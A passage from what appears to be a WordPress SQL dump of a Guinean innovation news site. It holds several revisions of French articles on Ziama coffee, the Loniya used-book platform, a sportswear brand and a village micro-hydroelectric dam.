jeunes d’ici 2023). Mais aussi de réduire la mortalité par la disponibilité des médicaments et réduire la pollution atmosphérique dus au nombre de trafic sur les voies ainsi que les embouteillages.','SEKOU LAMINE COYAH BANGOURA 1er Guinéen à être parmi les 10 finalistes du  \"Prix Orange de l\'Entrepreneur Social\".','','inherit','closed','closed','','670-revision-v1','','','2017-11-01 12:03:29','2017-11-01 12:03:29','',670,'https://guineeinnove.nimbasolution.com/2017/11/01/670-revision-v1/',0,'revision','',0),(815,1,'2017-11-01 12:06:21','2017-11-01 12:06:21','','Fatou','','inherit','open','closed','','fatou','','','2017-11-01 12:06:21','2017-11-01 12:06:21','',662,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Fatou.jpg',0,'attachment','image/jpeg',0),(818,1,'2017-11-01 12:16:19','2017-11-01 12:16:19','Le café ‘’Ziama’’ qui porte le nom de son origine géographique, est une nouvelle variété de qualité supérieure qui fait actuellement écho à travers le monde, a fait savoir le technologue du Laboratoire en caféiculture au Centre Régional de Recherche Agronomique de la Guinée Forestière (CRRA-GF), basé à Sérédou, M. Gono-yo Traoré, au cours d’un entretien.\n<img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/ziama-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" />\nM. Traoré a en outre indiqué, que ce café a été retenu meilleur <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> de qualité supérieure en Guinée après avoir organisé un test de tous les <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">cafés</a> produits actuellement dans les quatre régions naturelles de la Guinée. Le ‘’comportement agronomique’’ du<strong> <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama lié à son goût aromatique, acidulé et peu amer, son rendement élevé à l’hectare, sa résistance par rapport aux différentes maladies</strong>, sont entre autres les critères qui ont permis au Laboratoire de le classer parmi les meilleures qualités en Guinée, a-t-il ajouté.\nSelon toujours le technologue du Laboratoire, une étude comparative approfondie, réalisée par le Laboratoire au cours de l’année 2000, a également permis de savoir que le massif forestier de Ziama a une grande influence sur la qualité du <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a>…\nL’influence écologique du milieu, liée à la pluviométrie (9 mois et plus de pluie sur 12 mois de l’année) et à la végétation verdoyante, fait que n’importe quelle qualité de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> planté dans le milieu peut<i> ‘’se comporter de la même manière’’</i>, a-t-il fait remarquer.\nIl a par ailleurs, plaidé pour un appui technique et financier à l’Association des Producteurs de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">Café</a> (APC), afin que tout le processus de calibrage et de traitement de la nouvelle variété de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama, soit fait sur place à Sérédou, en vue d’éviter les cas de fraude, a ajouté M. Traoré.\n<b>Le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama Macenta de Guinée</b>, est un <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> robusta aux qualités exceptionnelles, proches de celle de l’Arabica. Cultivé en Guinée forestière sur le Mont Ziama, aux confins du Liberia et de la Côte d’Ivoire, le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a>Ziama Macenta est un robusta particulier : sa saveur est acidulée et peu amer. Il se distingue par ses arômes persistants, à la fois forts et fins.\n<a href=\"https://www.maxicoffee.com/cafe-c-6.html\"><img title=\"\" src=\"http://www.guineeconakry.info/typo3temp/pics/93d50eb614.gif\" alt=\"\" width=\"300\" height=\"225\" border=\"0\" /></a>\nLa qualité de ce <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> dépend fortement des opérations de récolte et de post-récolte. Les cerises doivent être récoltées de manière sélective à maturité en trois passages. Elles sont triées par trempage puis séchées au soleil avec des remuages réguliers. Le séchage se fait essentiellement au soleil sur claies pendant trois semaines. Les cerises sèches sont ensuite décortiquées mécaniquement en évitant les brisures.\nSelon de nombreux témoignages des anciens, <i>« au temps des colons, les collecteurs passaient longtemps à Macenta pour augmenter la qualité de leur mélange »</i>. Le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> de Macenta a ainsi acquis une notoriété auprès des importateurs et des torréfacteurs durant cette période. Il est encore utilisé aujourd’hui pour relever la base des <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">cafés</a> de plus mauvaise qualité.https://www.youtube.com/watch?v=0jeXbexRihs&amp;t=29s','Kerfalla Camara cultive un café aux qualités exceptionnelles.','','inherit','closed','closed','','638-autosave-v1','','','2017-11-01 12:16:19','2017-11-01 12:16:19','',638,'https://guineeinnove.nimbasolution.com/2017/11/01/638-autosave-v1/',0,'revision','',0),(819,1,'2017-11-01 12:16:27','2017-11-01 12:16:27','Le café ‘’Ziama’’ qui porte le nom de son origine géographique, est une nouvelle variété de qualité supérieure qui fait actuellement écho à travers le monde, a fait savoir le technologue du Laboratoire en caféiculture au Centre Régional de Recherche Agronomique de la Guinée Forestière (CRRA-GF), basé à Sérédou, M. Gono-yo Traoré, au cours d’un entretien.\r\n<img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/ziama-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" />\r\nM. Traoré a en outre indiqué, que ce café a été retenu meilleur <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> de qualité supérieure en Guinée après avoir organisé un test de tous les <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">cafés</a> produits actuellement dans les quatre régions naturelles de la Guinée. Le ‘’comportement agronomique’’ du<strong> <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama lié à son goût aromatique, acidulé et peu amer, son rendement élevé à l’hectare, sa résistance par rapport aux différentes maladies</strong>, sont entre autres les critères qui ont permis au Laboratoire de le classer parmi les meilleures qualités en Guinée, a-t-il ajouté.\r\nSelon toujours le technologue du Laboratoire, une étude comparative approfondie, réalisée par le Laboratoire au cours de l’année 2000, a également permis de savoir que le massif forestier de Ziama a une grande influence sur la qualité du <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a>…\r\nL’influence écologique du milieu, liée à la pluviométrie (9 mois et plus de pluie sur 12 mois de l’année) et à la végétation verdoyante, fait que n’importe quelle qualité de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> planté dans le milieu peut<i> ‘’se comporter de la même manière’’</i>, a-t-il fait remarquer.\r\nIl a par ailleurs, plaidé pour un appui technique et financier à l’Association des Producteurs de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">Café</a> (APC), afin que tout le processus de calibrage et de traitement de la nouvelle variété de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama, soit fait sur place à Sérédou, en vue d’éviter les cas de fraude, a ajouté M. Traoré.\r\n<b>Le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama Macenta de Guinée</b>, est un <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> robusta aux qualités exceptionnelles, proches de celle de l’Arabica. Cultivé en Guinée forestière sur le Mont Ziama, aux confins du Liberia et de la Côte d’Ivoire, le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a>Ziama Macenta est un robusta particulier : sa saveur est acidulée et peu amer. Il se distingue par ses arômes persistants, à la fois forts et fins.\r\n<a href=\"https://www.maxicoffee.com/cafe-c-6.html\"><img title=\"\" src=\"http://www.guineeconakry.info/typo3temp/pics/93d50eb614.gif\" alt=\"\" width=\"300\" height=\"225\" border=\"0\" /></a>\r\nLa qualité de ce <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> dépend fortement des opérations de récolte et de post-récolte. Les cerises doivent être récoltées de manière sélective à maturité en trois passages. Elles sont triées par trempage puis séchées au soleil avec des remuages réguliers. Le séchage se fait essentiellement au soleil sur claies pendant trois semaines. Les cerises sèches sont ensuite décortiquées mécaniquement en évitant les brisures.\r\nSelon de nombreux témoignages des anciens, <i>« au temps des colons, les collecteurs passaient longtemps à Macenta pour augmenter la qualité de leur mélange »</i>. Le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> de Macenta a ainsi acquis une notoriété auprès des importateurs et des torréfacteurs durant cette période. Il est encore utilisé aujourd’hui pour relever la base des <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">cafés</a> de plus mauvaise qualité.https://www.youtube.com/watch?v=0jeXbexRihs&amp;t=29s','Kerfalla Camara cultive un café aux qualités exceptionnelles.','','inherit','closed','closed','','638-revision-v1','','','2017-11-01 12:16:27','2017-11-01 12:16:27','',638,'https://guineeinnove.nimbasolution.com/2017/11/01/638-revision-v1/',0,'revision','',0),(820,1,'2017-11-01 12:17:19','2017-11-01 12:17:19','Le café ‘’Ziama’’ qui porte le nom de son origine géographique, est une nouvelle variété de qualité supérieure qui fait actuellement écho à travers le monde, a fait savoir le technologue du Laboratoire en caféiculture au Centre Régional de Recherche Agronomique de la Guinée Forestière (CRRA-GF), basé à Sérédou, M. Gono-yo Traoré, au cours d’un entretien.\r\n<img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/ziama-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" />\r\nM. Traoré a en outre indiqué, que ce café a été retenu meilleur <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> de qualité supérieure en Guinée après avoir organisé un test de tous les <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">cafés</a> produits actuellement dans les quatre régions naturelles de la Guinée. Le ‘’comportement agronomique’’ du<strong> <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama lié à son goût aromatique, acidulé et peu amer, son rendement élevé à l’hectare, sa résistance par rapport aux différentes maladies</strong>, sont entre autres les critères qui ont permis au Laboratoire de le classer parmi les meilleures qualités en Guinée, a-t-il ajouté.\r\nSelon toujours le technologue du Laboratoire, une étude comparative approfondie, réalisée par le Laboratoire au cours de l’année 2000, a également permis de savoir que le massif forestier de Ziama a une grande influence sur la qualité du <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a>…\r\nL’influence écologique du milieu, liée à la pluviométrie (9 mois et plus de pluie sur 12 mois de l’année) et à la végétation verdoyante, fait que n’importe quelle qualité de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> planté dans le milieu peut<i> ‘’se comporter de la même manière’’</i>, a-t-il fait remarquer.\r\nIl a par ailleurs, plaidé pour un appui technique et financier à l’Association des Producteurs de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">Café</a> (APC), afin que tout le processus de calibrage et de traitement de la nouvelle variété de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama, soit fait sur place à Sérédou, en vue d’éviter les cas de fraude, a ajouté M. Traoré.\r\n<b>Le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama Macenta de Guinée</b>, est un <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> robusta aux qualités exceptionnelles, proches de celle de l’Arabica. Cultivé en Guinée forestière sur le Mont Ziama, aux confins du Liberia et de la Côte d’Ivoire, le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a>Ziama Macenta est un robusta particulier : sa saveur est acidulée et peu amer. Il se distingue par ses arômes persistants, à la fois forts et fins.\r\n<a href=\"https://www.maxicoffee.com/cafe-c-6.html\"><img title=\"\" src=\"http://www.guineeconakry.info/typo3temp/pics/93d50eb614.gif\" alt=\"\" width=\"300\" height=\"225\" border=\"0\" /></a>\r\nLa qualité de ce <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> dépend fortement des opérations de récolte et de post-récolte. Les cerises doivent être récoltées de manière sélective à maturité en trois passages. Elles sont triées par trempage puis séchées au soleil avec des remuages réguliers. Le séchage se fait essentiellement au soleil sur claies pendant trois semaines. Les cerises sèches sont ensuite décortiquées mécaniquement en évitant les brisures.\r\nSelon de nombreux témoignages des anciens, <i>« au temps des colons, les collecteurs passaient longtemps à Macenta pour augmenter la qualité de leur mélange »</i>. Le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> de Macenta a ainsi acquis une notoriété auprès des importateurs et des torréfacteurs durant cette période. Il est encore utilisé aujourd’hui pour relever la base des <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">cafés</a> de plus mauvaise qualité.https://www.youtube.com/watch?v=0jeXbexRihs&amp;t=29s','Kerfalla Camara cultive un café avec des qualités exceptionnelles.','','inherit','closed','closed','','638-revision-v1','','','2017-11-01 12:17:19','2017-11-01 12:17:19','',638,'https://guineeinnove.nimbasolution.com/2017/11/01/638-revision-v1/',0,'revision','',0),(821,1,'2017-11-01 12:18:50','2017-11-01 12:18:50','Le café ‘’Ziama’’ qui porte le nom de son origine géographique, est une nouvelle variété de qualité supérieure qui fait actuellement écho à travers le monde, a fait savoir le technologue du Laboratoire en caféiculture au Centre Régional de Recherche Agronomique de la Guinée Forestière (CRRA-GF), basé à Sérédou, M. Gono-yo Traoré, au cours d’un entretien.\r\n<img src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/ziama-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" />\r\nM. Traoré a en outre indiqué, que ce café a été retenu meilleur <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> de qualité supérieure en Guinée après avoir organisé un test de tous les <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">cafés</a> produits actuellement dans les quatre régions naturelles de la Guinée. Le ‘’comportement agronomique’’ du<strong> <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama lié à son goût aromatique, acidulé et peu amer, son rendement élevé à l’hectare, sa résistance par rapport aux différentes maladies</strong>, sont entre autres les critères qui ont permis au Laboratoire de le classer parmi les meilleures qualités en Guinée, a-t-il ajouté.\r\nSelon toujours le technologue du Laboratoire, une étude comparative approfondie, réalisée par le Laboratoire au cours de l’année 2000, a également permis de savoir que le massif forestier de Ziama a une grande influence sur la qualité du <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a>…\r\nL’influence écologique du milieu, liée à la pluviométrie (9 mois et plus de pluie sur 12 mois de l’année) et à la végétation verdoyante, fait que n’importe quelle qualité de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> planté dans le milieu peut<i> ‘’se comporter de la même manière’’</i>, a-t-il fait remarquer.\r\nIl a par ailleurs, plaidé pour un appui technique et financier à l’Association des Producteurs de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">Café</a> (APC), afin que tout le processus de calibrage et de traitement de la nouvelle variété de <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama, soit fait sur place à Sérédou, en vue d’éviter les cas de fraude, a ajouté M. Traoré.\r\n<b>Le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> Ziama Macenta de Guinée</b>, est un <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> robusta aux qualités exceptionnelles, proches de celle de l’Arabica. Cultivé en Guinée forestière sur le Mont Ziama, aux confins du Liberia et de la Côte d’Ivoire, le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a>Ziama Macenta est un robusta particulier : sa saveur est acidulée et peu amer. Il se distingue par ses arômes persistants, à la fois forts et fins.\r\n<a href=\"https://www.maxicoffee.com/cafe-c-6.html\"><img title=\"\" src=\"http://www.guineeconakry.info/typo3temp/pics/93d50eb614.gif\" alt=\"\" width=\"300\" height=\"225\" border=\"0\" /></a>\r\nLa qualité de ce <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> dépend fortement des opérations de récolte et de post-récolte. Les cerises doivent être récoltées de manière sélective à maturité en trois passages. Elles sont triées par trempage puis séchées au soleil avec des remuages réguliers. Le séchage se fait essentiellement au soleil sur claies pendant trois semaines. Les cerises sèches sont ensuite décortiquées mécaniquement en évitant les brisures.\r\nSelon de nombreux témoignages des anciens, <i>« au temps des colons, les collecteurs passaient longtemps à Macenta pour augmenter la qualité de leur mélange »</i>. Le <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">café</a> de Macenta a ainsi acquis une notoriété auprès des importateurs et des torréfacteurs durant cette période. Il est encore utilisé aujourd’hui pour relever la base des <a href=\"https://www.maxicoffee.com/cafe-c-6.html\">cafés</a> de plus mauvaise qualité.https://www.youtube.com/watch?v=0jeXbexRihs&amp;t=29s','Des Guinéens cultivent un café avec des qualités exceptionnelles.','','inherit','closed','closed','','638-revision-v1','','','2017-11-01 12:18:50','2017-11-01 12:18:50','',638,'https://guineeinnove.nimbasolution.com/2017/11/01/638-revision-v1/',0,'revision','',0),(822,1,'2017-11-01 12:24:24','2017-11-01 12:24:24','','sb','','inherit','open','closed','','sb','','','2017-11-01 12:24:24','2017-11-01 12:24:24','',632,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/sb.jpg',0,'attachment','image/jpeg',0),(823,1,'2017-11-01 12:24:43','2017-11-01 12:24:43','Samba Sory Camara est un ingénieur agricole avec son entreprise agropastoral Business Kinyapa, il prône et pratique l\'agriculture Bio et conventionnelle.\r\nRegardez cette petite vidéo...https://www.youtube.com/watch?time_continue=16&amp;v=wQaejvxoQ2o','Sambako et sa petite révolution agricole.','','inherit','closed','closed','','632-revision-v1','','','2017-11-01 12:24:43','2017-11-01 12:24:43','',632,'https://guineeinnove.nimbasolution.com/2017/11/01/632-revision-v1/',0,'revision','',0),(824,1,'2017-11-01 12:45:10','2017-11-01 12:45:10','Directeur Général de TechEvox, le jeune Alpha Diallo à lancé en 2017 une plateforme pour palier à la difficulté d\'accès au livre en Guinée.\n\nVoici les mots de Ma\n\nEn 2017, Les projecteurs du monde se tournent vers Conakry désignée comme Capitale Mondiale du Livre. Mais force est de constater que la jeunesse guinéenne lit très peu. Ce manque d’engouement pour la lecture cache en réalité un problème plus profond. Les livres ne sont guère à la portée de toutes les bourses. Afin de faciliter l’accès au livre, nous avons développé une plateforme web/mobile dénommée « Loniya » Loniya, expression tirée du terme malinké « Lonniya » désignant la connaissance, est une application d’achat, de vente et d’échange de livres d’occasion créée par TechEvox. Cette initiative est née du constat fait sur la difficulté (liée à la cherté et la rareté des lieux de vente) d’accès aux livres neufs pour les masses. Fort de la vulgarisation de l’outil internet par une majeure partie de la population, TechEvox se propose de faciliter les mises en relation client/vendeur à travers sa plateforme <a href=\"https://www.loniya.org/\">www.loniya.org</a>. Afin, de ne pas laisser les lecteurs à la merci de la bulle spéculative, un algorithme sera mis en place pour modérer les transactions afin qu’elles respectent un seuil de prix fixe pour les versions physiques d’œuvres littéraires. De même, certaines œuvres « du domaine public », en conformité avec le respect des droits d’auteurs seront également disponibles en téléchargement libre en version numérique sur le site. La démarche de TechEvox qui se veut sociale, est de rendre cette application interactive, mais aussi d’initier et rapprocher les populations cibles de ce type inédit de librairie. Loniya permettra aux utilisateurs de vendre leurs lectures et de se procurer de nouvelles lectures plus enrichissantes. Tous les ouvrages peuvent être publiés sur la plateforme, allant des ouvrages scolaires/académiques en passant par les romans d’auteurs locaux et des livres d’auteurs célèbres, bien souvent difficiles à trouver sur le marché guinéen, permettant ainsi à la lecture d’être à la portée de tous.','Alpha Mamadou Diallo crée une plateforme pour faciliter l’accès au livre.','','inherit','closed','closed','','613-autosave-v1','','','2017-11-01 12:45:10','2017-11-01 12:45:10','',613,'https://guineeinnove.nimbasolution.com/2017/11/01/613-autosave-v1/',0,'revision','',0),(825,1,'2017-11-01 12:45:28','2017-11-01 12:45:28','Directeur Général de TechEvox, le jeune Alpha Diallo à lancé en 2017 une plateforme pour palier à la difficulté d\'accès au livre en Guinée.\r\n\r\nVoici les mots de Alpha Mamadou Diallo:\r\n\r\nEn 2017, Les projecteurs du monde se tournent vers Conakry désignée comme Capitale Mondiale du Livre. Mais force est de constater que la jeunesse guinéenne lit très peu. Ce manque d’engouement pour la lecture cache en réalité un problème plus profond. Les livres ne sont guère à la portée de toutes les bourses. Afin de faciliter l’accès au livre, nous avons développé une plateforme web/mobile dénommée « Loniya » Loniya, expression tirée du terme malinké « Lonniya » désignant la connaissance, est une application d’achat, de vente et d’échange de livres d’occasion créée par TechEvox. Cette initiative est née du constat fait sur la difficulté (liée à la cherté et la rareté des lieux de vente) d’accès aux livres neufs pour les masses. Fort de la vulgarisation de l’outil internet par une majeure partie de la population, TechEvox se propose de faciliter les mises en relation client/vendeur à travers sa plateforme <a href=\"https://www.loniya.org/\">www.loniya.org</a>. Afin, de ne pas laisser les lecteurs à la merci de la bulle spéculative, un algorithme sera mis en place pour modérer les transactions afin qu’elles respectent un seuil de prix fixe pour les versions physiques d’œuvres littéraires. De même, certaines œuvres « du domaine public », en conformité avec le respect des droits d’auteurs seront également disponibles en téléchargement libre en version numérique sur le site. La démarche de TechEvox qui se veut sociale, est de rendre cette application interactive, mais aussi d’initier et rapprocher les populations cibles de ce type inédit de librairie. Loniya permettra aux utilisateurs de vendre leurs lectures et de se procurer de nouvelles lectures plus enrichissantes. Tous les ouvrages peuvent être publiés sur la plateforme, allant des ouvrages scolaires/académiques en passant par les romans d’auteurs locaux et des livres d’auteurs célèbres, bien souvent difficiles à trouver sur le marché guinéen, permettant ainsi à la lecture d’être à la portée de tous.','Alpha Mamadou Diallo crée une plateforme pour faciliter l’accès au livre.','','inherit','closed','closed','','613-revision-v1','','','2017-11-01 12:45:28','2017-11-01 12:45:28','',613,'https://guineeinnove.nimbasolution.com/2017/11/01/613-revision-v1/',0,'revision','',0),(826,1,'2017-11-01 12:57:50','2017-11-01 12:57:50','','alpha','','inherit','open','closed','','alpha','','','2017-11-01 12:57:50','2017-11-01 12:57:50','',613,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/alpha.jpg',0,'attachment','image/jpeg',0),(827,1,'2017-11-01 13:00:44','2017-11-01 13:00:44','<p>Guinée Sport est gérée par une dame qui entend faire de la marque Nimba une fierté nationale. La nouvelle ligne de maillot a été présentée aux Guinéens à la bluezone de Conakry.</p><p>Après deux ans, Guinée Sport a enfin réussi à présenter sa marque de vêtements de sport. Cette jeune entreprise offre quinze emplois fixes. La nouvelle marque Nimba a été présentée aux Guinéens à travers un défilé et une exposition vente de maillots à Conakry.</p><p>Guinée Sport propose des maillots pour toutes les disciplines sportives et souhaite se faire accompagner par les autorités sportives guinéennes.</p><p>Avec ses sept machines à coudre, Guinée Sport a signé avec trois clubs de football de première division, l’équipe nationale de handball et plusieurs équipes scolaires et universitaires de Guinée.</p>https://www.youtube.com/watch?v=4McQdO9Hwd0','Une marque de vêtements de sport en Guinée','','inherit','closed','closed','','603-revision-v1','','','2017-11-01 13:00:44','2017-11-01 13:00:44','',603,'https://guineeinnove.nimbasolution.com/2017/11/01/603-revision-v1/',0,'revision','',0),(828,1,'2017-11-01 13:09:29','2017-11-01 13:09:29','','sss','','inherit','open','closed','','sss','','','2017-11-01 13:09:29','2017-11-01 13:09:29','',411,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/sss.jpg',0,'attachment','image/jpeg',0),(829,1,'2017-11-01 13:10:07','2017-11-01 13:10:07','','feu','','inherit','open','closed','','feu','','','2017-11-01 13:10:07','2017-11-01 13:10:07','',411,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/feu.jpg',0,'attachment','image/jpeg',0),(830,1,'2017-11-01 13:10:07','2017-11-01 13:10:07','Diallo Thierno Mamadou Djan, concepteur d\'une maquette, d\'un feu de croisement intelligent est reçu par le DG de l\' Agence de Promotion des Investissements Privés.\n\n&nbsp;','Diallo Thierno Mamadou Djan, concepteur d\'une maquette, d\'un feu de croisement intelligent','','inherit','closed','closed','','411-autosave-v1','','','2017-11-01 13:10:07','2017-11-01 13:10:07','',411,'https://guineeinnove.nimbasolution.com/2017/11/01/411-autosave-v1/',0,'revision','',0),(831,1,'2017-11-01 13:10:16','2017-11-01 13:10:16','Diallo Thierno Mamadou Djan, concepteur d\'une maquette, d\'un feu de croisement intelligent est reçu par le DG de l\' Agence de Promotion des Investissements Privés.\r\n\r\n<img class=\"alignnone size-full wp-image-829\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/feu.jpg\" alt=\"\" width=\"290\" height=\"174\" />','Diallo Thierno Mamadou Djan, concepteur d\'une maquette, d\'un feu de croisement intelligent','','inherit','closed','closed','','411-revision-v1','','','2017-11-01 13:10:16','2017-11-01 13:10:16','',411,'https://guineeinnove.nimbasolution.com/2017/11/01/411-revision-v1/',0,'revision','',0),(832,1,'2017-11-01 13:16:52','2017-11-01 13:16:52','<p class=\"story-body__introduction\">Certains disent de lui qu\'il a \"ramené la lumière dans les ténèbres de Bolodou\", une localité située dans la préfecture de Guéckédou (une subdivision de la région de Nzérékoré) dans le Sud-Est de la Guinée.</p>\nExcédé par la situation dans sa localité, Ibrahima Tounkara, enseignant de Mathématiques, a construit un micro-barrage hydroélectrique sur le marigot Gbasso, l\'un des cours d\'eau qui arrosent cette commune rurale.\n\n<aside class=\"quote\">\n<div class=\"quote-inner\">\n<blockquote class=\"quote\">Quand j\'ai dit aux villageois que je comptais réaliser un mini-barrage hydroélectrique, personne ne m\'a cru. J\'ai économisé assez d\'argent pour financer mon projet qui, aujourd\'hui, profite à tous<footer>Ibrahima Tounkara, Enseignant de Mathématiques</footer></blockquote>\n</div>\n</aside>Son projet a été réalisé sur fonds propres. Les travaux lui ont couté environ 50 millions de francs guinéens (environ 3 millions de FCFA).\n\n<img class=\"alignnone size-medium wp-image-833\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/97723064_img_20170730_131943-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" />\n\n\"Quand j\'ai dit aux villageois que je comptais réaliser un mini-barrage hydroélectrique, personne ne m\'a cru. J\'ai commencé par vendre des panneaux solaires. J\'ai économisé assez d\'argent pour financer mon projet, confie-t-il.\n\nIbrahima n\'y connaissait presque rien en hydraulique. Pour réaliser son mini-barrage, il a fait des recherches essentiellement sur Google.\n\n\"Je l\'ai d\'abord fait pour ma famille. Je savais que mes parents n\'avaient pas d\'électricité chez eux et je me suis dit qu\'il fallait faire quelque chose, ne serait-ce que pour avoir de quoi charger leurs téléphones\", explique Ibrahima.\n\nAujourd\'hui, le mini-barrage de Ibrahima Tounkara illumine pas moins de 90 foyers sur environ 94 que compte le village.\n\nSelon les chiffres de la Banque mondiale, \"un Africain sur deux n\'a pas accès à l\'électricité. De plus en plus, les énergies renouvelables et mini-réseaux s\'avèrent être des pistes prometteuses, pour l\'heure insuffisantes.','Electricité: un homme construit un micro-barrage de 9KVA dans une localité de Guéckédou','','inherit','closed','closed','','405-autosave-v1','','','2017-11-01 13:16:52','2017-11-01 13:16:52','',405,'https://guineeinnove.nimbasolution.com/2017/11/01/405-autosave-v1/',0,'revision','',0),(833,1,'2017-11-01 13:16:35','2017-11-01 13:16:35','','_97723064_img_20170730_131943','','inherit','open','closed','','_97723064_img_20170730_131943','','','2017-11-01 13:16:35','2017-11-01 13:16:35','',405,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/97723064_img_20170730_131943.jpg',0,'attachment','image/jpeg',0),(834,1,'2017-11-01 13:17:01','2017-11-01 13:17:01','<p class=\"story-body__introduction\">Certains disent de lui qu\'il a \"ramené la lumière dans les ténèbres de Bolodou\", une localité située dans la préfecture de Guéckédou (une subdivision de la région de Nzérékoré) dans le Sud-Est de la Guinée.</p>\r\nExcédé par la situation dans sa localité, Ibrahima Tounkara, enseignant de Mathématiques, a construit un micro-barrage hydroélectrique sur le marigot Gbasso, l\'un des cours d\'eau qui arrosent cette commune rurale.\r\n\r\n<aside class=\"quote\">\r\n<div class=\"quote-inner\">\r\n<blockquote class=\"quote\">Quand j\'ai dit aux villageois que je comptais réaliser un mini-barrage hydroélectrique, personne ne m\'a cru. J\'ai économisé assez d\'argent pour financer mon projet qui, aujourd\'hui, profite à tous<footer>Ibrahima Tounkara, Enseignant de Mathématiques</footer></blockquote>\r\n</div>\r\n</aside>Son projet a été réalisé sur fonds propres. Les travaux lui ont couté environ 50 millions de francs guinéens (environ 3 millions de FCFA).\r\n\r\n<img class=\"alignnone size-medium wp-image-833\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/97723064_img_20170730_131943-300x169.jpg\" alt=\"\" width=\"300\" height=\"169\" />\r\n\r\n\"Quand j\'ai dit aux villageois que je comptais réaliser un mini-barrage hydroélectrique, personne ne m\'a cru. J\'ai commencé par vendre des panneaux solaires. J\'ai économisé assez d\'argent pour financer mon projet, confie-t-il.\r\n\r\nIbrahima n\'y connaissait presque rien en hydraulique. Pour réaliser son mini-barrage, il a fait des recherches essentiellement sur Google.\r\n\r\n\"Je l\'ai d\'abord fait pour ma famille. Je savais que mes parents n\'avaient pas d\'électricité chez eux et je me suis dit qu\'il fallait faire quelque chose, ne serait-ce que pour avoir de quoi charger leurs téléphones\", explique Ibrahima.\r\n\r\nAujourd\'hui, le mini-barrage de Ibrahima Tounkara illumine pas moins de 90 foyers sur environ 94 que compte le village.\r\n\r\nSelon les chiffres de la Banque mondiale, \"un Africain sur deux n\'a pas accès à l\'électricité. De plus en plus, les énergies renouvelables et mini-réseaux s\'avèrent être des pistes prometteuses, pour l\'heure insuffisantes.','Electricité: un homme construit un micro-barrage de 9KVA dans une localité de Guéckédou','','inherit','closed','closed','','405-revision-v1','','','2017-11-01 13:17:01','2017-11-01 13:17:01','',405,'https://guineeinnove.nimbasolution.com/2017/11/01/405-revision-v1/',0,'revision','',0),(835,1,'2017-11-01 13:40:03','2017-11-01 13:40:03','<a href=\"http://Earthguinee.org\">Earthguinee.org</a> est un site spécialisé dans la production d’actualités relatives à l’environnement et au développement durable.\r\n\r\nIl promeut l’utilisation des énergies nouvelles et renouvelables, la lutte contre le changement climatique, la désertification, le respect de la biodiversité, la promotion technologies nouvelles visant la 